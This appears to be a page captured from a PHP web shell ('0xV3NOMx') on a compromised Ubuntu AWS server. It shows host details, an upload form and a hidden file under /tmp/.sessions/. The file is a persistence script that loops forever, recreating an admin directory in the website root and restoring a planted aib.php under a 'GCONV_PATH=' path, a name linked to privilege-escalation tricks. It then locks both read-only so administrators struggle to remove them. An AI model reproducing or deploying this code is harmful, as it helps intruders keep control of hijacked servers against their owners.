0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 18.219.110.54


Current Path : /tmp/.sessions/
Upload File :
Current File : //tmp/.sessions/.L2tvcC9HQ09OVl9QQVRIPS5haWItaGFuZGxlcg==

<?php
@ini_set("max_execution_time", 0);
while (True){
    if (!file_exists("/var/www/website/nublr/admin")){
        mkdir("/var/www/website/nublr/admin");
    }
    if (!file_exists("/kop/GCONV_PATH=./aib.php")){
        $text = base64_encode(file_get_contents("/tmp/.sessions/.L2tvcC9HQ09OVl9QQVRIPS5haWItdGV4dA=="));
        file_put_contents("/kop/GCONV_PATH=./aib.php", base64_decode($text));
    }
    if (gecko_perm("/kop/GCONV_PATH=./aib.php") != 0444){
        chmod("/kop/GCONV_PATH=./aib.php", 0444);
    }
    if (gecko_perm("/var/www/website/nublr/admin") != 0555){
        chmod("/var/www/website/nublr/admin", 0555);
    }
}

function gecko_perm($flename){
    return substr(sprintf("%o", fileperms($flename)), -4);
}